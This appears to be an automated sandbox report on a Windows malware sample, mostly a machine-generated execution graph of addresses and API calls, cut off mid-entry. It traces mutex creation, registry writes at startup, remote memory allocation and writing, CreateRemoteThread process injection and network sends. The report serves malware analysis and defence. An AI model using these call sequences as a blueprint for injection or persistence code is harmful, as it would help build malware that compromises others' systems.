                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$\$jjjjjj$$`q$$`q
                                                                            • API String ID: 0-713343189
                                                                            • Opcode ID: b390f0b808d56fbab78e8c4bade50f9253c2a82acf75fe0b0e2461a62fd9da79
                                                                            • Instruction ID: f282b21547740331e786075bc9d1d5ddf533293197ba5ba35531edfee37beab4
                                                                            • Opcode Fuzzy Hash: b390f0b808d56fbab78e8c4bade50f9253c2a82acf75fe0b0e2461a62fd9da79
                                                                            • Instruction Fuzzy Hash: 09B0125240D3C54EC3430E5554C00407F30AA3300030E41C6C4800F443D0004A86C721
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:5.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:62
                                                                            execution_graph 12000 40124c 12003 40910d 12000->12003 12014 4018c7 12003->12014 12006 4113ed CreateMutexA 12007 409148 LoadLibraryW 12006->12007 12008 411e88 lstrcmpA 12007->12008 12009 409178 12008->12009 12010 411e88 lstrcmpA 12009->12010 12011 409189 12010->12011 12012 411e88 lstrcmpA 12011->12012 12013 401251 12012->12013 12017 406099 GetProcessHeap HeapAlloc 12014->12017 12016 4018f0 InitializeCriticalSection 12016->12006 12017->12016 11917 40125b 11920 40e5a3 InitializeCriticalSection 11917->11920 11972 406099 GetProcessHeap HeapAlloc 11920->11972 11922 40e5f2 11973 403411 11922->11973 11925 403411 9 API calls 11926 40e63b 11925->11926 11927 4036f7 4 API calls 11926->11927 11928 40e648 11927->11928 11983 4032e6 11928->11983 11931 403549 3 API calls 11932 40e65d 11931->11932 11988 405feb VirtualFree 11932->11988 11934 40e665 11989 405feb VirtualFree 11934->11989 11936 40e670 11990 411177 GetCurrentProcess 11936->11990 11939 40e67a 11942 403411 9 API calls 11939->11942 11940 40e6af 11941 4032e6 5 API calls 11940->11941 11943 40e6b9 11941->11943 11944 40e686 11942->11944 11945 403549 3 API calls 11943->11945 11946 4032e6 5 API calls 11944->11946 11948 40e6c6 11945->11948 11947 40e690 11946->11947 11949 403549 3 API calls 11947->11949 11995 405feb VirtualFree 11948->11995 11951 40e69d 11949->11951 11993 405feb VirtualFree 11951->11993 11952 40e6ad 11954 40357c 9 API calls 11952->11954 11956 40e6db 11954->11956 11955 40e6a5 11958 403411 9 API calls 11955->11958 11957 40357c 9 API calls 11956->11957 11959 40e6e3 11957->11959 11958->11952 11960 40357c 9 API calls 11959->11960 11961 40e6f2 11960->11961 11994 410c3e SHCreateDirectoryExW 11961->11994 11963 40e6f9 11964 403549 3 API calls 11963->11964 11965 40e706 11964->11965 11966 40357c 9 API calls 11965->11966 11967 40e712 11966->11967 11968 40357c 9 API calls 11967->11968 11969 40e71f 11968->11969 11970 40357c 9 API calls 11969->11970 11971 401260 11970->11971 11972->11922 11974 403422 11973->11974 11975 40341d 11973->11975 11977 4036f7 4 API calls 11974->11977 11997 405feb VirtualFree 11975->11997 11978 403430 11977->11978 11979 403447 5 API calls 11978->11979 11980 403438 11979->11980 11996 405feb VirtualFree 11980->11996 11982 403440 11982->11925 11984 401052 11983->11984 11985 403308 ExpandEnvironmentStringsW 11984->11985 11986 4036f7 4 API calls 11985->11986 11987 40332d 11986->11987 11987->11931 11988->11934 11989->11936 11998 4121dc GetModuleHandleA GetProcAddress 11990->11998 11993->11955 11994->11963 11995->11952 11996->11982 11997->11974 11999 40e675 11998->11999 11999->11939 11999->11940 15166 403d5c 15167 413441 11 API calls 15166->15167 15168 403d75 15167->15168 15169 403666 11 API calls 15168->15169 15170 403d82 15169->15170 15171 403237 4 API calls 15170->15171 15172 403d8b 15171->15172 15177 405feb VirtualFree 15172->15177 15174 403d93 15178 405feb VirtualFree 15174->15178 15176 403d9b 15177->15174 15178->15176 12405 401c71 12408 405feb VirtualFree 12405->12408 12407 401c82 12408->12407 12409 41027a 12410 403507 3 API calls 12409->12410 12411 410290 12410->12411 12420 404b42 12411->12420 12419 4102b1 12421 4031af 10 API calls 12420->12421 12422 404b60 12421->12422 12423 403549 3 API calls 12422->12423 12424 404b69 12423->12424 12439 405feb VirtualFree 12424->12439 12426 404b71 12440 405feb VirtualFree 12426->12440 12428 404b7d 12429 405044 12428->12429 12430 405059 12429->12430 12441 4056f5 12430->12441 12432 405062 12433 403148 2 API calls 12432->12433 12434 40506a 12433->12434 12435 404ae4 12434->12435 12460 405feb VirtualFree 12435->12460 12437 404af5 12438 405feb VirtualFree 12437->12438 12438->12419 12439->12426 12440->12428 12442 405706 12441->12442 12443 40570a 12441->12443 12442->12432 12444 4034d1 4 API calls 12443->12444 12445 405717 12444->12445 12446 403115 7 API calls 12445->12446 12447 405720 12446->12447 12459 405feb VirtualFree 12447->12459 12449 405728 12450 40315e 2 API calls 12449->12450 12451 405735 12450->12451 12452 40315e 2 API calls 12451->12452 12453 405742 12452->12453 12454 4061f0 4 API calls 12453->12454 12455 40574a send 12454->12455 12456 403148 2 API calls 12455->12456 12457 40576e 12456->12457 12458 403148 2 API calls 12457->12458 12458->12442 12459->12449 12460->12437 15308 401b7d 15311 4038d2 15308->15311 15314 405feb VirtualFree 15311->15314 15313 401b85 15314->15313 15318 407501 15319 4036f7 4 API calls 15318->15319 15320 407526 15319->15320 15352 4079f6 15320->15352 15323 407629 PathFindFileNameW 15324 4036f7 4 API calls 15323->15324 15327 407656 15324->15327 15325 407627 15326 40768f 15325->15326 15328 411644 CloseHandle 15325->15328 15329 4076ba 24 API calls 15326->15329 15330 4041b7 4 API calls 15327->15330 15328->15326 15332 40769d 15329->15332 15333 407662 15330->15333 15376 407929 15332->15376 15337 405044 15 API calls 15333->15337 15334 4075bc PathFindFileNameW 15340 4036f7 4 API calls 15334->15340 15335 40756c PathFindFileNameW 15338 4036f7 4 API calls 15335->15338 15341 40766b 15337->15341 15351 407539 15338->15351 15340->15351 15343 40411d VirtualFree 15341->15343 15342 403148 2 API calls 15345 4076af 15342->15345 15346 407674 15343->15346 15344 4041b7 lstrlenW lstrcpyW VirtualFree VirtualAlloc 15344->15351 15347 403148 2 API calls 15346->15347 15347->15325 15348 405044 15 API calls 15348->15351 15349 40411d VirtualFree 15349->15351 15350 403148 GetProcessHeap RtlFreeHeap 15350->15351 15351->15325 15351->15334 15351->15335 15351->15344 15351->15348 15351->15349 15351->15350 15363 407981 15351->15363 15384 406099 GetProcessHeap HeapAlloc 15352->15384 15354 407a14 15355 4113ed CreateMutexA 15354->15355 15356 407a3b 15355->15356 15357 403549 3 API calls 15356->15357 15358 407a4f 15357->15358 15359 4116b1 2 API calls 15358->15359 15360 407a5d 15359->15360 15385 405feb VirtualFree 15360->15385 15362 40752f 15362->15323 15362->15351 15364 40798c 15363->15364 15369 4079d9 15363->15369 15365 4079e0 15364->15365 15366 4079a8 15364->15366 15364->15369 15367 41135c 12 API calls 15365->15367 15386 41135c 15366->15386 15367->15369 15369->15351 15370 4079b3 15398 401085 GetProcessHeap RtlAllocateHeap 15370->15398 15372 4079c1 15373 4030cc 6 API calls 15372->15373 15374 4079d3 15373->15374 15399 401099 GetProcessHeap RtlFreeHeap 15374->15399 15377 407932 15376->15377 15378 40793a 15376->15378 15379 411644 CloseHandle 15377->15379 15380 41140c 4 API calls 15378->15380 15379->15378 15383 407942 15380->15383 15381 4076a6 15381->15342 15382 403148 2 API calls 15382->15383 15383->15381 15383->15382 15384->15354 15385->15362 15387 411372 15386->15387 15388 41136a 15386->15388 15401 406045 GetProcessHeap RtlAllocateHeap 15387->15401 15400 41178e WaitForSingleObject 15388->15400 15391 41137e SetFilePointer ReadFile 15392 4030cc 6 API calls 15391->15392 15393 4113ae 15392->15393 15402 406034 GetProcessHeap RtlFreeHeap 15393->15402 15395 4113b5 15396 4113c4 15395->15396 15397 4113bb ReleaseMutex 15395->15397 15396->15370 15397->15396 15398->15372 15399->15369 15400->15387 15401->15391 15402->15395 12536 40f403 12543 401085 GetProcessHeap RtlAllocateHeap 12536->12543 12538 40f417 12542 40f515 12538->12542 12544 401085 GetProcessHeap RtlAllocateHeap 12538->12544 12540 40f451 12545 4022e8 12540->12545 12543->12538 12544->12540 12546 4022f2 12545->12546 12547 4022ff 12545->12547 12546->12547 12549 401099 GetProcessHeap RtlFreeHeap 12546->12549 12547->12542 12549->12547 12816 40920d 12823 406099 GetProcessHeap HeapAlloc 12816->12823 12818 40921c 12819 40373f 3 API calls 12818->12819 12822 409236 12818->12822 12820 40922f 12819->12820 12824 411722 12820->12824 12823->12818 12831 4117b7 CreateMutexA 12824->12831 12826 411736 12827 403549 3 API calls 12826->12827 12828 411742 12827->12828 12832 405feb VirtualFree 12828->12832 12830 411757 12830->12822 12831->12826 12832->12830 16400 403919 16401 40391d 16400->16401 16402 40395e 16400->16402 16403 413441 11 API calls 16401->16403 16404 40393d 16403->16404 16405 403549 3 API calls 16404->16405 16406 403947 16405->16406 16409 405feb VirtualFree 16406->16409 16408 40394f 16409->16408 12846 403e1e 12847 403e22 12846->12847 12848 403e63 12846->12848 12849 403e2e 12847->12849 12851 402f87 8 API calls 12847->12851 12850 403549 3 API calls 12848->12850 12852 403e68 12850->12852 12853 403e97 12851->12853 12859 405feb VirtualFree 12852->12859 12855 402fce 2 API calls 12853->12855 12856 403ea0 12855->12856 12857 403148 2 API calls 12856->12857 12858 403ea8 12857->12858 12859->12847 12134 40121f 12137 4143af 12134->12137 12144 4117b7 CreateMutexA 12137->12144 12139 4143c4 12145 406099 GetProcessHeap HeapAlloc 12139->12145 12141 4143cc 12143 401224 12141->12143 12146 414e7b 12141->12146 12144->12139 12145->12141 12158 406099 GetProcessHeap HeapAlloc 12146->12158 12148 414e9b 12159 406099 GetProcessHeap HeapAlloc 12148->12159 12150 414ec5 12152 414ed1 12150->12152 12169 414611 12150->12169 12160 4148b6 CoInitialize CoCreateInstance 12152->12160 12155 414ef1 12155->12143 12156 414ee3 12156->12155 12172 4146e1 CoInitialize CoCreateInstance 12156->12172 12158->12148 12159->12150 12161 414a0d 12160->12161 12167 4148f6 12160->12167 12161->12155 12161->12156 12163 41493d VariantInit 12163->12167 12164 4149e7 CoUninitialize 12164->12161 12167->12161 12167->12163 12167->12164 12183 406099 GetProcessHeap HeapAlloc 12167->12183 12184 414b6e 12167->12184 12189 402503 12167->12189 12170 414b6e 2 API calls 12169->12170 12171 414622 12170->12171 12171->12152 12173 41472d 12172->12173 12174 414851 CoUninitialize 12172->12174 12173->12174 12196 414a12 12173->12196 12174->12156 12177 414757 12177->12174 12178 414760 CoCreateInstance 12177->12178 12178->12174 12179 41477e 12178->12179 12179->12174 12200 414492 12179->12200 12183->12167 12193 405f37 GetProcessHeap HeapAlloc 12184->12193 12186 414b79 12194 405f37 GetProcessHeap HeapAlloc 12186->12194 12188 414b85 12188->12167 12190 402512 12189->12190 12192 40252f 12189->12192 12195 406099 GetProcessHeap HeapAlloc 12190->12195 12192->12167 12193->12186 12194->12188 12195->12192 12210 4143ee CoInitialize CoCreateInstance 12196->12210 12198 414a24 CoCreateInstance 12199 414a4d 12198->12199 12199->12177 12201 41449d CoTaskMemFree 12200->12201 12202 4144ac 12200->12202 12201->12202 12203 414ad1 12202->12203 12204 405de9 3 API calls 12203->12204 12205 414ae7 12204->12205 12206 405de9 3 API calls 12205->12206 12207 414afe 12206->12207 12208 405de9 3 API calls 12207->12208 12209 414b37 12208->12209 12209->12174 12211 414486 CoUninitialize 12210->12211 12212 414422 12210->12212 12211->12198 12212->12211 10715 405e28 GetCommandLineA 10717 405e3d GetStartupInfoA 10715->10717 10724 405eb6 10717->10724 10719 405e89 10720 405e98 GetModuleHandleA 10719->10720 10727 4154eb 10720->10727 10789 405dd4 GetProcessHeap HeapAlloc 10724->10789 10726 405ec5 10726->10719 10728 415511 10727->10728 10729 41551d GetTickCount 10728->10729 10790 4010ad 10729->10790 10731 415529 GetModuleFileNameA 10791 4134a2 10731->10791 10733 41576e 11167 41267d 10733->11167 10736 415553 10736->10733 10798 401085 GetProcessHeap RtlAllocateHeap 10736->10798 10740 41557d 10741 415599 CreateEventA GetLastError 10740->10741 10741->10733 10742 4155bc 10741->10742 10742->10733 10743 4155c8 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 10742->10743 10799 405b4e Sleep 10743->10799 10789->10726 10790->10731 11185 401085 GetProcessHeap RtlAllocateHeap 10791->11185 10793 4134b7 CreateFileA 10794 4134dc 10793->10794 10795 4134df GetFileSize ReadFile 10793->10795 10794->10795 10796 4134fd 10795->10796 10797 4134ff FindCloseChangeNotification 10795->10797 10796->10797 10797->10736 10798->10740 11186 41196e 10799->11186 10801 405b72 11191 411865 10801->11191 10809 405ba5 11221 40315e 10809->11221 10811 405bb1 11224 402fce 10811->11224 10813 405bbd 11228 403148 10813->11228 10823 405bf3 10824 413441 11 API calls 10823->10824 10825 405c12 10824->10825 10826 403549 3 API calls 10825->10826 10827 405c1f 10826->10827 11263 405feb VirtualFree 10827->11263 10829 405c27 10830 413441 11 API calls 10829->10830 10831 405c46 10830->10831 10832 403549 3 API calls 10831->10832 10833 405c53 10832->10833 11264 405feb VirtualFree 10833->11264 10835 405c5b 10836 413441 11 API calls 10835->10836 10837 405c7a 10836->10837 10838 403549 3 API calls 10837->10838 10839 405c87 10838->10839 11265 405feb VirtualFree 10839->11265 10841 405c8f 10842 413441 11 API calls 10841->10842 10843 405cdd 10842->10843 10844 403549 3 API calls 10843->10844 10845 405cea 10844->10845 11266 405feb VirtualFree 10845->11266 10847 405cfa 10848 403148 2 API calls 10847->10848 10849 405d02 10848->10849 10850 403148 2 API calls 10849->10850 10851 405d0a 10850->10851 10852 405d17 10851->10852 11274 401eb2 10851->11274 10854 403148 2 API calls 10852->10854 10855 405d2a 10854->10855 11267 41140c 10855->11267 10858 412a7f 11380 402446 10858->11380 10861 41111b 4 API calls 10862 412a9b 10861->10862 10863 4036f7 4 API calls 10862->10863 10864 412ac7 10863->10864 10865 403549 3 API calls 10864->10865 10866 412acf 10865->10866 11395 405feb VirtualFree 10866->11395 10868 412ad7 10869 40373f 3 API calls 10868->10869 10870 412ae3 10869->10870 11396 403447 10870->11396 11168 412687 11167->11168 11169 41268c 11167->11169 11170 412554 RegCloseKey 11168->11170 11171 405d5c 3 API calls 11169->11171 11170->11169 11172 412694 11171->11172 11912 405feb VirtualFree 11172->11912 11174 41269c 11913 405feb VirtualFree 11174->11913 11176 4126a7 11914 405feb VirtualFree 11176->11914 11178 4126b2 11915 405feb VirtualFree 11178->11915 11180 4126bd 11916 405feb VirtualFree 11180->11916 11182 4126c8 11183 412554 RegCloseKey 11182->11183 11184 4126d3 11183->11184 11185->10793 11278 4113ed 11186->11278 11190 411996 11190->10801 11192 411881 11191->11192 11193 405b80 11191->11193 11192->11193 11194 4118a0 11192->11194 11195 4118fe 11192->11195 11204 4034d1 lstrlenA 11193->11204 11283 4030cc 11194->11283 11195->11193 11197 4030cc 6 API calls 11195->11197 11198 41191c 11197->11198 11198->11193 11200 411fe2 6 API calls 11198->11200 11202 402312 6 API calls 11198->11202 11200->11198 11202->11198 11203 4118b6 11203->11193 11286 411fe2 11203->11286 11290 402312 11203->11290 11205 403500 11204->11205 11206 4034e4 lstrlenA 11204->11206 11209 4117d8 11205->11209 11312 405f68 VirtualAlloc 11206->11312 11208 4034f4 lstrcpyA 11208->11205 11216 4117ea 11209->11216 11219 405b9d 11209->11219 11212 4034d1 4 API calls 11212->11216 11215 403148 2 API calls 11215->11216 11216->11212 11216->11215 11217 41184f 11216->11217 11216->11219 11314 405de9 LoadLibraryA GetProcAddress 11216->11314 11319 412018 11216->11319 11322 4034b5 lstrcmpA 11216->11322 11323 405feb VirtualFree 11216->11323 11324 40241a 11217->11324 11220 405feb VirtualFree 11219->11220 11220->10809 11329 406045 GetProcessHeap RtlAllocateHeap 11221->11329 11223 403170 11223->10811 11225 402fe6 11224->11225 11227 402feb 11224->11227 11330 406045 GetProcessHeap RtlAllocateHeap 11225->11330 11227->10813 11229 403151 11228->11229 11230 403156 11228->11230 11331 406034 GetProcessHeap RtlFreeHeap 11229->11331 11232 405aae 11230->11232 11332 402f87 11232->11332 11235 40315e 2 API calls 11236 405ae1 11235->11236 11339 405a61 11236->11339 11241 403148 2 API calls 11242 405afe 11241->11242 11243 413441 11242->11243 11244 413455 11243->11244 11254 405be1 11243->11254 11362 401085 GetProcessHeap RtlAllocateHeap 11244->11362 11246 413460 11363 4036f7 lstrlenW 11246->11363 11248 413483 11249 403549 3 API calls 11248->11249 11250 41348b 11249->11250 11368 405feb VirtualFree 11250->11368 11252 413493 11369 401099 GetProcessHeap RtlFreeHeap 11252->11369 11255 403549 11254->11255 11256 403574 11255->11256 11257 40355b 11255->11257 11262 405feb VirtualFree 11256->11262 11372 403496 11257->11372 11259 403562 11260 405f68 VirtualAlloc 11259->11260 11261 403569 lstrcpyW 11260->11261 11261->11256 11262->10823 11263->10829 11264->10835 11265->10841 11266->10847 11375 411644 11267->11375 11271 41141c 11379 405feb VirtualFree 11271->11379 11273 405d32 11273->10858 11275 401ed5 11274->11275 11277 401ec4 11274->11277 11275->10852 11276 403148 2 API calls 11276->11277 11277->11275 11277->11276 11282 4117b7 CreateMutexA 11278->11282 11280 4113fd 11281 406099 GetProcessHeap HeapAlloc 11280->11281 11281->11190 11282->11280 11302 40600b 11283->11302 11285 4030e2 11285->11203 11287 411ffb 11286->11287 11288 4030cc 6 API calls 11287->11288 11289 412010 11288->11289 11289->11203 11291 40232c 11290->11291 11297 4023e0 11290->11297 11311 406099 GetProcessHeap HeapAlloc 11291->11311 11293 402fce 2 API calls 11294 402408 11293->11294 11295 403148 2 API calls 11294->11295 11296 402413 11295->11296 11296->11203 11297->11293 11298 4023d1 11298->11297 11300 401eb2 2 API calls 11298->11300 11299 402355 11299->11298 11301 402fce 2 API calls 11299->11301 11300->11297 11301->11299 11303 406016 11302->11303 11304 40600f GetProcessHeap RtlAllocateHeap 11302->11304 11306 406022 GetProcessHeap HeapReAlloc 11303->11306 11307 40601a 11303->11307 11304->11285 11306->11285 11310 406034 GetProcessHeap RtlFreeHeap 11307->11310 11309 40601f 11309->11285 11310->11309 11311->11299 11313 405f86 11312->11313 11313->11208 11315 405e27 11314->11315 11316 405e08 11314->11316 11315->11216 11317 405e0c 11316->11317 11318 405e1f ExitProcess 11316->11318 11317->11318 11320 402fce 2 API calls 11319->11320 11321 412040 11320->11321 11321->11216 11322->11216 11323->11216 11325 405de9 3 API calls 11324->11325 11326 40242f 11325->11326 11327 412018 2 API calls 11326->11327 11328 40243d 11327->11328 11328->11219 11329->11223 11330->11227 11331->11230 11360 406045 GetProcessHeap RtlAllocateHeap 11332->11360 11334 402f96 11335 4030cc 6 API calls 11334->11335 11336 402fbf 11335->11336 11361 406034 GetProcessHeap RtlFreeHeap 11336->11361 11338 402fc6 11338->11235 11340 405a73 11339->11340 11348 405a95 11339->11348 11341 402f87 8 API calls 11340->11341 11343 405a85 11341->11343 11342 40315e 2 API calls 11344 405aa5 11342->11344 11345 402fce 2 API calls 11343->11345 11349 4061f0 11344->11349 11346 405a8d 11345->11346 11347 403148 2 API calls 11346->11347 11347->11348 11348->11342 11350 40315e 2 API calls 11349->11350 11351 406208 11350->11351 11352 40315e 2 API calls 11351->11352 11353 406248 11352->11353 11354 403148 2 API calls 11353->11354 11355 406250 11354->11355 11356 403148 2 API calls 11355->11356 11357 406258 11356->11357 11358 403148 2 API calls 11357->11358 11359 405af3 11358->11359 11359->11241 11360->11334 11361->11338 11362->11246 11364 405f68 VirtualAlloc 11363->11364 11365 403712 lstrlenW 11364->11365 11370 406077 11365->11370 11367 40372c KiUserExceptionDispatcher 11367->11248 11368->11252 11369->11254 11371 406083 11370->11371 11371->11367 11373 40349b 11372->11373 11374 40349e lstrlenW 11372->11374 11373->11259 11374->11259 11376 411414 11375->11376 11377 41164d CloseHandle 11375->11377 11378 4117a2 ReleaseMutex FindCloseChangeNotification 11376->11378 11377->11376 11378->11271 11379->11273 11381 402fce 2 API calls 11380->11381 11382 402468 11381->11382 11383 403549 3 API calls 11382->11383 11384 402474 11383->11384 11385 403549 3 API calls 11384->11385 11386 40248c 11385->11386 11387 403549 3 API calls 11386->11387 11388 40249e 11387->11388 11389 403549 3 API calls 11388->11389 11390 4024aa 11389->11390 11391 403549 3 API calls 11390->11391 11392 4024bc 11391->11392 11393 402fce 2 API calls 11392->11393 11394 4024ec 11393->11394 11394->10861 11395->10868 11445 403373 11396->11445 11398 403459 11399 403373 lstrlenW 11398->11399 11400 403462 11399->11400 11446 403381 11445->11446 11447 403378 lstrlenW 11445->11447 11446->11398 11447->11398 11912->11174 11913->11176 11914->11178 11915->11180 11916->11182 12018 40122e 12021 415c9b 12018->12021 12106 4025d2 12021->12106 12024 4025d2 VirtualAlloc 12025 415cb8 12024->12025 12026 4025d2 VirtualAlloc 12025->12026 12027 415cc2 12026->12027 12028 4025d2 VirtualAlloc 12027->12028 12029 415ccc 12028->12029 12030 4025d2 VirtualAlloc 12029->12030 12031 415cd6 12030->12031 12032 4025d2 VirtualAlloc 12031->12032 12033 415ce0 12032->12033 12034 4025d2 VirtualAlloc 12033->12034 12035 415cea 12034->12035 12109 401085 GetProcessHeap RtlAllocateHeap 12035->12109 12037 415d16 12110 401085 GetProcessHeap RtlAllocateHeap 12037->12110 12039 415d1f 12111 401085 GetProcessHeap RtlAllocateHeap 12039->12111 12041 415d28 12112 401085 GetProcessHeap RtlAllocateHeap 12041->12112 12043 415d31 12113 401085 GetProcessHeap RtlAllocateHeap 12043->12113 12045 415d3b 12114 401085 GetProcessHeap RtlAllocateHeap 12045->12114 12047 415d45 12115 401085 GetProcessHeap RtlAllocateHeap 12047->12115 12049 415d4f 12116 413363 12049->12116 12052 413363 2 API calls 12053 415d60 12052->12053 12054 413363 2 API calls 12053->12054 12055 415d67 12054->12055 12056 413363 2 API calls 12055->12056 12057 415d6f 12056->12057 12058 413363 2 API calls 12057->12058 12059 415d77 12058->12059 12060 413363 2 API calls 12059->12060 12061 415d7f 12060->12061 12062 413363 2 API calls 12061->12062 12063 415d87 12062->12063 12064 4034d1 4 API calls 12063->12064 12065 415d93 12064->12065 12120 4112c4 12065->12120 12067 415d9e 12123 405feb VirtualFree 12067->12123 12069 415da6 12070 4034d1 4 API calls 12069->12070 12071 415db0 12070->12071 12072 4112c4 5 API calls 12071->12072 12073 415dbb 12072->12073 12124 405feb VirtualFree 12073->12124 12075 415dc3 12076 4034d1 4 API calls 12075->12076 12077 415dcd 12076->12077 12078 4112c4 5 API calls 12077->12078 12079 415dd8 12078->12079 12125 405feb VirtualFree 12079->12125 12081 415de0 12082 4034d1 4 API calls 12081->12082 12083 415dec 12082->12083 12084 4112c4 5 API calls 12083->12084 12085 415df7 12084->12085 12126 405feb VirtualFree 12085->12126 12087 415dff 12088 4034d1 4 API calls 12087->12088 12089 415e0b 12088->12089 12090 4112c4 5 API calls 12089->12090 12091 415e16 12090->12091 12127 405feb VirtualFree 12091->12127 12093 415e1e 12094 4034d1 4 API calls 12093->12094 12095 415e2a 12094->12095 12096 4112c4 5 API calls 12095->12096 12097 415e35 12096->12097 12128 405feb VirtualFree 12097->12128 12099 415e3d 12100 4034d1 4 API calls 12099->12100 12101 415e49 12100->12101 12102 4112c4 5 API calls 12101->12102 12103 415e54 12102->12103 12129 405feb VirtualFree 12103->12129 12105 401233 12130 4112f0 12106->12130 12109->12037 12110->12039 12111->12041 12112->12043 12113->12045 12114->12047 12115->12049 12117 413369 12116->12117 12119 413386 12117->12119 12133 41338d Sleep GetTickCount 12117->12133 12119->12052 12121 403237 4 API calls 12120->12121 12122 4112d6 CreateEventA 12121->12122 12122->12067 12123->12069 12124->12075 12125->12081 12126->12087 12127->12093 12128->12099 12129->12105 12131 4032d5 VirtualAlloc 12130->12131 12132 4025e5 12131->12132 12132->12024 12133->12117 10712 409733 10713 405feb VirtualFree 10712->10713 10714 40973e 10712->10714 13261 403e39 13262 413441 11 API calls 13261->13262 13263 403e5e 13262->13263 13264 403549 3 API calls 13263->13264 13265 403e68 13264->13265 13274 405feb VirtualFree 13265->13274 13267 403e6f 13268 402f87 8 API calls 13267->13268 13269 403e97 13268->13269 13270 402fce 2 API calls 13269->13270 13271 403ea0 13270->13271 13272 403148 2 API calls 13271->13272 13273 403ea8 13272->13273 13274->13267 13284 40263b 13285 40263e 13284->13285 13286 40267f 13284->13286 13287 402694 13286->13287 13288 40269b 13286->13288 13295 407e67 13287->13295 13314 407d5e 13288->13314 13292 4026a0 VirtualFree 13293 403148 2 API calls 13292->13293 13294 4026b6 13293->13294 13296 407e84 13295->13296 13297 407e7f 13295->13297 13299 407e99 OpenProcess 13296->13299 13329 407a8e 13296->13329 13328 40fb98 GetCurrentProcess IsWow64Process GetProcessHeap 13297->13328 13301 407eb6 13299->13301 13304 402699 13299->13304 13338 40fbb4 13301->13338 13304->13292 13307 40fbb4 7 API calls 13308 407efc 13307->13308 13308->13304 13354 40fae9 13308->13354 13310 407f3b 13310->13304 13311 40fae9 7 API calls 13310->13311 13312 407f69 13311->13312 13312->13304 13362 40fc62 13312->13362 13315 407d82 OpenProcess 13314->13315 13316 407d74 13314->13316 13318 407da0 VirtualAllocEx 13315->13318 13321 407d98 13315->13321 13393 40fb98 GetCurrentProcess IsWow64Process GetProcessHeap 13316->13393 13320 407dc0 VirtualProtectEx VirtualAllocEx 13318->13320 13318->13321 13319 407d79 13319->13315 13320->13321 13322 407df6 13320->13322 13321->13292 13323 407e08 WriteProcessMemory 13322->13323 13323->13321 13324 407e1d 13323->13324 13324->13321 13325 407e2d WriteProcessMemory 13324->13325 13325->13321 13326 407e45 13325->13326 13326->13321 13327 407e4a CreateRemoteThread 13326->13327 13327->13321 13328->13296 13330 410cff 2 API calls 13329->13330 13331 407aa4 VirtualAlloc GetWindowsDirectoryA lstrlenA 13330->13331 13332 407adb 13331->13332 13333 407ae7 CreateProcessA 13332->13333 13334 407b21 13333->13334 13335 407b11 Sleep 13333->13335 13337 410cd8 2 API calls 13334->13337 13336 407b29 13335->13336 13336->13299 13337->13336 13339 40fbd4 13338->13339 13340 40fbe9 13338->13340 13339->13340 13370 40f541 13339->13370 13345 407ec6 13340->13345 13378 40f238 13340->13378 13345->13304 13346 40fd0d 13345->13346 13347 40fd28 13346->13347 13350 40fd3d 13346->13350 13348 40f541 4 API calls 13347->13348 13347->13350 13349 40fd31 13348->13349 13352 40f19e 4 API calls 13349->13352 13351 40f238 3 API calls 13350->13351 13353 407ee7 13350->13353 13351->13353 13352->13350 13353->13307 13355 40fb07 13354->13355 13358 40fb1c 13354->13358 13356 40f541 4 API calls 13355->13356 13355->13358 13357 40fb10 13356->13357 13359 40f19e 4 API calls 13357->13359 13360 40f238 3 API calls 13358->13360 13361 40fb7a 13358->13361 13359->13358 13360->13361 13361->13310 13363 40fc8d 13362->13363 13365 40fca2 13362->13365 13364 40f541 4 API calls 13363->13364 13363->13365 13366 40fc96 13364->13366 13367 40f238 3 API calls 13365->13367 13369 40fcf4 13365->13369 13368 40f19e 4 API calls 13366->13368 13367->13369 13368->13365 13369->13304 13371 40f551 13370->13371 13372 40f55a 13370->13372 13371->13372 13382 40f567 13371->13382 13374 40f19e 13372->13374 13375 40f1b2 13374->13375 13377 40f1bf 13374->13377 13375->13377 13390 40f29d 13375->13390 13377->13340 13379 40f244 13378->13379 13380 40f24e GetModuleHandleW GetProcAddress GetProcAddress 13378->13380 13379->13380 13381 40f287 13379->13381 13380->13381 13381->13345 13383 40f7be 13382->13383 13386 40f580 13382->13386 13383->13372 13385 40f7c7 13388 4022e8 2 API calls 13385->13388 13386->13383 13386->13385 13387 4022e8 2 API calls 13386->13387 13389 401085 GetProcessHeap RtlAllocateHeap 13386->13389 13387->13386 13388->13383 13389->13386 13391 40f541 4 API calls 13390->13391 13392 40f2ae 13391->13392 13392->13377 13393->13319 13394 40123d 13397 40c0f0 13394->13397 13400 40216d 13397->13400 13403 406099 GetProcessHeap HeapAlloc 13400->13403 13402 401242 13403->13402 13404 41023e 13405 403507 3 API calls 13404->13405 13406 410254 13405->13406 13407 404b42 10 API calls 13406->13407 13408 41025c 13407->13408 13409 405044 15 API calls 13408->13409 13410 410265 13409->13410 13411 404ae4 VirtualFree 13410->13411 13412 41026d 13411->13412 13415 405feb VirtualFree 13412->13415 13414 410275 13415->13414 13423 401cca 13426 403eaf 13423->13426 13427 403148 2 API calls 13426->13427 13428 403ec0 13427->13428 13431 405feb VirtualFree 13428->13431 13430 401cd2 13431->13430 13432 4154cd 13435 4020f0 13432->13435 13436 40216d 2 API calls 13435->13436 13439 40210b 13436->13439 13437 40212e 13439->13437 13441 4021c1 13439->13441 13446 402028 13439->13446 13442 405de9 3 API calls 13441->13442 13443 4021d6 13442->13443 13458 401ff2 13443->13458 13447 4020c1 13446->13447 13448 40203e 13446->13448 13450 402137 3 API calls 13447->13450 13465 406099 GetProcessHeap HeapAlloc 13448->13465 13451 4020de 13450->13451 13452 401441 VirtualFree 13451->13452 13453 4020e9 13452->13453 13453->13439 13454 4020b5 13454->13447 13457 401ad0 VirtualFree 13454->13457 13455 402067 13455->13454 13466 402137 13455->13466 13457->13447 13459 40373f 3 API calls 13458->13459 13460 402002 13459->13460 13461 40373f 3 API calls 13460->13461 13462 40200e 13461->13462 13463 40373f 3 API calls 13462->13463 13464 40201a 13463->13464 13464->13439 13465->13455 13467 403549 3 API calls 13466->13467 13468 402147 13467->13468 13469 403549 3 API calls 13468->13469 13470 402153 13469->13470 13471 403549 3 API calls 13470->13471 13472 40215f 13471->13472 13472->13455 13473 404cd7 13474 404cea 13473->13474 13494 404d34 13473->13494 13475 